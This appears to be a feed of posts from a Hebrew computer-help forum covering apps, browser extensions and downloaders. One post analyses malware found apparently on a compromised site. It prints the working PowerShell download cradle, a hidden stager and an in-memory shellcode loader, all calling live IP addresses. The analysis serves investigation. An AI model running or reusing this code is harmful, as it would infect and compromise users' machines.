עזרה הדדית - מחשבים וטכנולוגיה

כתב בעזרה | יש לי חלום... אפליקציית מצא לי מניין! אשמח לשמוע חוו"ד: @AVIVI בעיקרון הבעיה הכי קשה פה שאני רואה זה הפרסום צריך שזה יהיה מפורסם ברמה ממש גבוהה שיהיה לפחות כמה אלפים אם זה כדי שזה יהיה מבצעי כמו שצריך ואת זה קשה מאוד להשיג צריך שיהיה 10 אנשים לפחות שיהיה להם את אותו אפליקציה ולכולם יהיה מיקום וכולם ילחצו על האפליקציה בדיוק באותו זמן ואיזור שבו כל ה10 נמצאים קשה לי להאמין שנגיע לזה אם זה לא יהיה מפורסם ברמה ממש גבוהה כמו קו העבודה וכו' שיש שם כמה אלפים... אבל בכל אופן לא באתי ח"ו לייאש להפך אני חושב כמוך שזה רעיון מהפכני. @מטען-נייד

https://github.com/rcmaehl/MSEdgeRedirect/releases/download/0.8.0.0/MSEdgeRedirect.exe זה אמור להעביר כל בקשה מedge לכרום לא ניסיתי אף פעם תעדכן בבקשה אם עבד

@נחמה-וידאו לאנדרואיד יש אז כניראה שיש למחשב

@עמי-מחשבים כתב בשיתוף | תוסף יו-טוב לעדכון אוטומטי מיוטיוב למאגר סרטונים פתוחים לפי הסינון שלכם: יש תוסף בנטפרי בדיקת קישורים פתוחים כבר לא עובד עקב חסימת הAPI ע"י נטפרי לשימוש לא מורשה בגרסה החדשה. אם כי הוא עדיין עובד על סמך מאגר הקישורים שאסף בעבר.

@מים-אחרונים @בנימין-מחשבים העליתי את התוסף לחנות של כרום https://chromewebstore.google.com/detail/הורדת-אודיו-מגוגל-צאט/neopkjnhhhekdnncampfkeckjjljechi?pli=1

אקדים ואומר זה מכיל פקודות זדוניות נא להפעיל ראש לפני שסתם עושים דברים, אחרת אני לא אחראי על חוסר האחריות שלכם. Spoiler זה עכשיו מאוד קצר, אני ישתדל להרחיב ולהסביר אחרי זה ביתר פירוט. אם עניין מישהו אז הפקודה הזאת powershell -c iex(irm 158.94.208.86 -UseBasicParsing) מורידה את הסקריפט הזה (צריך user agent של powershell), try { $bjIpBGrKhSw = @' try { $checkResult = Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing Invoke-Expression $checkResult.Content } catch { } '@ $nwlOLRnbTJHJGuIzB = New-Object System.Diagnostics.ProcessStartInfo $nwlOLRnbTJHJGuIzB.FileName = "powershell.exe" $nwlOLRnbTJHJGuIzB.Arguments = "-Command " + [char]34 + $bjIpBGrKhSw + [char]34 $nwlOLRnbTJHJGuIzB.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $nwlOLRnbTJHJGuIzB.CreateNoWindow = $true $nwlOLRnbTJHJGuIzB.UseShellExecute = $false $PmgaQrhIGPERnniVQ = New-Object System.Diagnostics.Process $PmgaQrhIGPERnniVQ.StartInfo = $nwlOLRnbTJHJGuIzB $PmgaQrhIGPERnniVQ.Start() | Out-Null } catch { } שעושה כמה בדיקות ואז מוריד את הסקריפט הזה, $qfxynVtaoWkTGXPO = "http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin" try { $wkjmvrrQYG = Invoke-WebRequest -Uri $qfxynVtaoWkTGXPO -UseBasicParsing -ErrorAction Stop $fxfUCqgKMKyq = $wkjmvrrQYG.Content $jQYxAVfWTktBrihYMu = $fxfUCqgKMKyq.Length $oifeVAXruKV = @" using System; using System.Runtime.InteropServices; public class xKuKzcdScrPfQpehRq { [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr GetCurrentProcess(); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid); [DllImport("kernel32.dll", SetLastError=true)] public static extern uint WaitForSingleObject(IntPtr h, uint ms); } "@ Add-Type -TypeDefinition $oifeVAXruKV $LDeyMEWUGUaRBLR = 0x1000 $YMnLUdAdCBUqtPwzZe = 0x2000 $NfbibNbjY = 0x40 $VJzynl = [xKuKzcdScrPfQpehRq]::VirtualAlloc([IntPtr]::Zero, $jQYxAVfWTktBrihYMu, $LDeyMEWUGUaRBLR -bor $YMnLUdAdCBUqtPwzZe, $NfbibNbjY) if ($VJzynl -eq [IntPtr]::Zero) { throw "Alloc failed" } [System.Runtime.InteropServices.Marshal]::Copy($fxfUCqgKMKyq, 0, $VJzynl, $jQYxAVfWTktBrihYMu) $RcgZSyj = 0 $cDVcAqtqupLLT = [xKuKzcdScrPfQpehRq]::CreateThread([IntPtr]::Zero, 0, $VJzynl, [IntPtr]::Zero, 0, [ref]$RcgZSyj) if ($cDVcAqtqupLLT -eq [IntPtr]::Zero) { throw "Thread failed" } [xKuKzcdScrPfQpehRq]::WaitForSingleObject($cDVcAqtqupLLT, 30000) | Out-Null Write-Host "done." } catch { exit 1 } שהוא למעשה מוריד את הבינארי הזדוני ורק לram הוא מעולם לא נשמר למחשב, my_l .bin.7z סיסמה infected https://www.virustotal.com/gui/file/c92950568a2b757d4ee0bad84b33f5b3414f0d5fdf3d3f5b06e7d304a7ccf1a1 לאחר מכן הshell code הזה שהוא מאוד דומה לפרויקט הזה ש@מתכנת-חובב העלה לא מזמן, התוכנה הזאת מזריקה את עצמה לprocess בווינדוס כדוג' svchost.exe ומשם ממשיכה הלאה צריך לראות מה ממשיך משם. בכול אופן אני עכשיו מתמקד על איך האתר נפגע מלכתחילה ואיך הפריצה עובדת עכשיו.

@לאצי כתב בלהורדה | NotiForum - תוסף להתראות מכל סוגי הפורומים גרסה 2.3.0 : הפוסט הראשון נערך. וואו, תודה!!

@DHOC979 כתב בשיתוף | בונה כעת אתר חדש למוזיקה יהודית להורדה - מחפש הצעות ייעול ושיפור: בפרט קובץ WAV שהוא כבד יותר ליתר דיוק הרבה יותר כבד תראו כאן אותו סט בדיוק וכמה שוקל כל אחד רק בגלל פורמט איכותי יותר [image: 1774869279212-cdd537d1-112a-49c0-8e30-7e85363ce6bc-image.png]

@SHIMI-0 יש הרבה אבל משהו טוב ברמה הזו לא נראה לי שקיים

@בבא אם יש דרך להיכנס למכשיר שלא דרך החשבון הקיים אז עדיף ליצור חשבון נקי ולא לחטט למי שזרק את הטלפון ... אין לי הבנה בזה להדריך איך

@בנימין-מחשבים מצטער לא זכרתי איפה זה כתוב ומי כתב...

@העניו-הגאה שיר שיש בו תמונה אצלי בסייר הקבצים זה יסביר לך אם הבעיה היא בסייר הקבצים שלך או משהו נוסף

@מומחה123 כתב בהמלצה | תוסף חוסם פרסומות עובד בנטפרי (פרוג): אני משתמש בתוסף כדי לחסום פרסומות באתר שלהם... גם אני 🤫 אני חוסם את הפרסומת הענקית בצד ימין...

@שקאד כן זה שווה בארץ זה עולה פי שניים אבל לא כדי מאמזון כי כשאתה מגיע לשלם אתה רואה שהם גובים ממך חוץ מזה עוד כסף על המכס ומס הכנסה בקיצור יעלה לך כפול ממה שמוצג עכשיו

[image: 1774825550741-%D7%AA%D7%9E%D7%95%D7%A0%D7%94-%D7%9E%D7%95%D7%93%D7%91%D7%A7%D7%AA-4.png] [image: 1774825550761-%D7%AA%D7%9E%D7%95%D7%A0%D7%94-%D7%9E%D7%95%D7%93%D7%91%D7%A7%D7%AA-3.png]

@sivan22 הרשמה למה? איפה? יש לי את זה מזמן, אשמח לביהור יתר

אני משתמש בזה https://www.4kdownload.com/products/videodownloader-42 עובד מצויין, גם בנטפרי ממש פשוט לתפעול ממליץ בחום!